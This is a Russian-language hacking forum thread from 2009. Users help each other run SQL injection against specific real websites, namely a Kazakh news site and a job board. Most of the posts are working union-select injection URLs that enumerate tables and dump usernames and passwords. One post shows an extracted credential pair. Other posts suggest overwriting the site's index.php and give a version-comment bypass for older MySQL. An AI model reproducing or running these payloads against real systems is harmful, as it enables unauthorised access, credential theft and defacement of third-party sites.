Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

22.01.2009, 23:08
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
попугай
да (
даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index
Последний раз редактировалось sabe; 22.01.2009 в 23:40..
|
|
|

22.01.2009, 23:49
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме: 253038
Репутация:
9
|
|
Код:
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,version(),user(),database())--
Не могу понять, нашел все таблицы, но ни в одну не пускает, может ктонить поможет?
|
|
|

23.01.2009, 00:00
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
В каком плане "не пускает"?
Код:
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--
|
|
|

23.01.2009, 00:01
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_schema,table_n ame)+from+information_schema.columns+where+column_ name+like+char(112,97,115,115)+limit+0,1--
например достаем таблу с пассами..
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+adil soz.noc+limit+0,1--
осюда и вывод
slava; 1234Slava1
|
|
|

23.01.2009, 00:03
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме: 253038
Репутация:
9
|
|
Сообщение от R1dex
В каком плане "не пускает"?
Код:
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--
у меня чето ошибку выдовала, хз почему, а эту таблицу ты как нарыл, через limit?
|
|
|

23.01.2009, 00:05
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Да, через лимит.
Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"
|
|
|

23.01.2009, 00:17
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме: 253038
Репутация:
9
|
|
Сообщение от R1dex
Да, через лимит.
Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"
Спасибо, большое! Все понял, а как часто вот так вот нужно к именам таблиц что-то добавлять, и как узнать что именно добавлять?
|
|
|

23.01.2009, 00:19
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Код:
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_name,table_schema)+from+information_schema.tables+limit+45,1--
table_name - имя таблицы
table_schema - бд, в которой таблица
В данном случае - ibf_cal_events:forum, значит запрос будет выглядеть:
from+froum.ibf_cal_events
Последний раз редактировалось R1dex; 23.01.2009 в 00:21..
|
|
|

23.01.2009, 00:36
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме: 253038
Репутация:
9
|
|
Вот еще,
Код:
http://rabota.kz/candidates/vacancies.php?cat=123+order+by+2--
прекрассно видно что только два числа должны отображаться, а при вводе
Код:
http://rabota.kz/candidates/vacancies.php?cat=123+union+select+1,2--
выдает ошибку, объясните плз, где я ошибся? Заранее благодарен!
|
|
|

23.01.2009, 00:42
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
версия мускула = 3+ там нет union select
http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|